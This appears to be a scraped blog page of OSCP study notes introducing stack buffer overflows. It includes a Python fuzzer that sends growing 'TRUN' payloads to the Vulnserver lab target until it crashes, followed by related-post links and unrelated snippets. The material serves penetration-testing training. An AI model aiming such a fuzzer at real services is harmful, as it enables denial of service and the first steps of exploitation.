Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0..XX

3.Write the Python fuzzer test script on Kali Linux

 #!/usr/bin/python

 import socket

 import sys

 buffer=["A"]

 counter=100

 while len(buffer) <= 30:

     buffer.append("A"*counter)

     counter=counter+200

 for string in buffer:

     print "Fuzzing vulnserver with %s bytes" % len(string)

     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     connect=s.connect(('10.0.0.XX',9999))

     s.send('TRUN /.:/' + string)

     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod  fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

GUI Screenshoot

Open or attach the vulnserver program.

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

The vulnserver crashed finally.

OSCP Learning Notes - Buffer Overflows(1)的更多相关文章

  1. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  2. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  3. OSCP Learning Notes - Buffer Overflows(5)

    Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of K ...

  4. OSCP Learning Notes - Buffer Overflows(4)

    Finding the Right Module(mona) Mona Module Project website: https://github.com/corelan/mona 1. Downl ...

  5. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  6. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  9. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

随机推荐

  1. rust 九九乘法表

    fn main(){ for i in 1..10 { for j in 1..i+1 { print!("{}*{}={:<2} ",j,i,i*j); } print!( ...

  2. TXT文件的写入及读出

    一.文件的读出: file = open('url/data.txt','r',encoding='utf-8')#打开模式r w a,当文件在当前工作区域直接写文件名:如果不在当前工作区域要写绝对地 ...

  3. 一小时彻底搞懂RabbitMQ

    windows上面安装rabbitmq-server-3.7.4.exe 首先需要安装otp_win64_20.3.exe 步骤1:安装Erlang RabbitMQ 它依赖于Erlang,需要先安装 ...

  4. Linux安装Redis 6.0.5 ./install_server.sh报错

    Linux安装Redis 6.0.5 ./install_server.sh报错 linux 安装Redis6.0.5时 进行到./install_server.sh时报错, This systems ...

  5. caffe的python接口学习(3)训练模型training

    如果不进行可视化,只想得到一个最终的训练model, 那么代码非常简单,如下 : import caffe caffe.set_device(0) caffe.set_mode_gpu() solve ...

  6. Dll的多字节和Unicode

    Dll的多字节和Unicode 分类: MFC2013-10-17 13:00 28人阅读 评论(0) 收藏 举报 dll字符集字符集多字节Unicode 我们定义dll的时候会区分: 字符集:使用多 ...

  7. 一.vue 初识

    jquery开发的问题: 提供了简单的api,简化了操作dom的方式,但没有对业务逻辑分层,需要维护数据和dom间的同步.1.vue做的事情就是:能够将视图(web界面上能看到的元素--文字/输入框/ ...

  8. dll备份注意事项

    test.dll20161111和test.dll同目录的时候,会报错!因为这样跟test1.dll(只是重名民)的效果是一样的,都会报错的. 同目录的情况下,应该改成test.dll.ddd. 为了 ...

  9. scrapy框架结构与工作原理

    组件: ENGINE:引擎,框架的核心,其他组件在其控制下协同工作. SCHEDULER:调度器,负责对SPIDER提交的下载请求进行调度 DOWNLOADER:下载器,负责下载页面,发送HTTP请求 ...

  10. CountDownLatch 线程工具类

    CountDownLatch:概念是,允许一个或多个线程等待其他线程完成操作: 在线程基础知识中,学习过线程的join方法,当前线程阻塞等待join线程执行完毕才能执行: 测试代码如下: public ...